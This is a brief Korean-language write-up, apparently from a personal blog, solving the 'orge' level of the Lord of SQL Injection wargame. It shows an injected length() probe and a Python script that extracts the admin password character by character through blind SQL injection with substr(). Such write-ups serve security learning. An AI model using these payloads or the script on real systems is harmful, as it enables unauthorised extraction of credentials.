blind sql injection이다
먼저 pw 길이를 알아내기 위하여 lenght함수를 사용하였다.
pw='||lenght(pw)8%23을 입력해 주었더니 hello admin을 볼 수 있었다.
import requests cookies= {'PHPSESSID':'7a4pokemhooffbduohsbglc420'} url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?' pw = '' for i in range(1,9): for j in range(33,127): payload = "pw=' || id='admin' %26%26 substr(pw,1,"+str(i)+")='"+pw+chr(j)+"#" new_url = url+payload res = requests.get(new_url, cookies=cookies) res.raise_for_status() if "Hello admin" in res.text : pw += chr(j) print("pw: "+pw) break print ("pw : "+pw)
'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글
| [Lord of SQL Injection] 9번 vampire (0) | 2021.01.21 |
|---|---|
| [Lord of SQL Injection] 8번 troll (0) | 2021.01.21 |
| [Lord of SQL Injection] 6번 darkelf (0) | 2021.01.21 |
| [Lord of SQL Injection] 5번 wolfman (0) | 2021.01.21 |
| [Lord of SQL Injection] 4번 orc (0) | 2021.01.21 |
